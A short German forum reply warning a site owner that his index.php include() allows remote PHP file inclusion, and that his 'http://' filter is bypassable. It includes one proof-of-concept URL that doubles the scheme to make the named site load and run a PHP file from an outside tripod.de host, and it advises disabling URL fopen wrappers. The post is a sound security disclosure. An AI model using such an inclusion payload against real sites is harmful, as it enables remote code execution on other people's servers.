uepselon: Sicherheitsloch!!

Beitrag lesen

Hallo Fabian,

du hast noch ein recht großes Sicherheits Risiko auf deiner Seite,
der include() erlaubt es auch, remote-php-Files auszuführen, deine Abfrage nach "http://" ist definitiv nicht sicher.

Siehe hier:

http://fabiantranschel.i-networx.de/index.php?page=http:http:////members.tripod.de/tselb/secu

Ich würde an deiner stelle das index.php Script nochmals überarbeiten. Sprich URL fopen wrappers deaktivieren wenn möglich, oder eine bessere Abfrage machen.

Viele Grüße

ueps